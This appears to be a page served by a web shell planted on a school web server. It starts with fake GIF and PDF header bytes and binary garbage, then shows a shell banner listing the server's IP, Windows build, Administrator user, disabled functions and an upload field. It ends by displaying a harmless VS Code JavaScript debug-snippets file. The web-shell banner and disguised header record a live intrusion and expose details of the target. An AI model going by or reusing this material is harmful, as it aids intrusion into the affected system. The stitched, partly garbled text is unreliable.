GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1022/Resources/ |
Upload File : |
{ // Place your snippets for javascript here. // Each snippet is defined under a snippet name and has a prefix, body and description. // The prefix is what is used to trigger the snippet and the body will be expanded and inserted. // Possible variables are: // $1, $2 for tab stops, $0 for the final cursor position. // ${1:label}, ${2:another} for placeholders. Placeholders with the same ids are connected. // Example: // "Print to console": { // "prefix": "log", // "body": [ // "console.log('$1');", // "$2" // ], // "description": "Log output to console" // } "Add console.log": { "prefix": [ " console-log", ], "body": [ "console.log(`\\${PC}xxx=\\${xxx} yyy=\\${yyy}`, CL);" ], "description": "Insert a console.log stub." }, "Add if (DEBUG){}": { "prefix": [ " if-DEBUG", ], "body": [ "if (DEBUG) { $0 }" ], "description": "Insert an 'if (DEBUG)' statement." }, "Add DEBUG = ": { "prefix": [ " let-DEBUG", ], "body": [ "let DEBUG = ${1|false,true|};" ], "description": "Insert a 'let DEBUG = statement." }, "Add if (DEBUG) {console.log}": { "prefix": [ " if-DEBUG-console", ], "body": [ "if (DEBUG) { console.log(`\\${PC}xxx=\\${xxx} yyy=\\${yyy}`, CL); }" ], "description": "Insert an 'if (DEBUG)' {console.log} statement." }, "Add console.group": { "prefix": [ " console-group", ], "body": [ "let DEBUG = ${1|true,false|};", "if (DEBUG) { console.group(`\\${PC}function_name[para1=\\${para1} para2=\\${para2}]`, CG); }", "if (DEBUG) { console.groupEnd(); }" ], "description": "Insert DEBUG, console.group and console.groupEnd statements." }, "Add console.group with else": { "prefix": [ " console-group-else", ], "body": [ "let DEBUG = ${1|true,false|};", "if (DEBUG) { console.group(`\\${PC}function_name[para1=\\${para1} para2=\\${para2}]`, CG); } else { console.log(`\\${PC}function_name[para1=\\${para1} para2=\\${para2}]`, CH); }", "if (DEBUG) { console.groupEnd(); }" ], "description": "Insert DEBUG, console.group, else, and console.groupEnd statements." }, }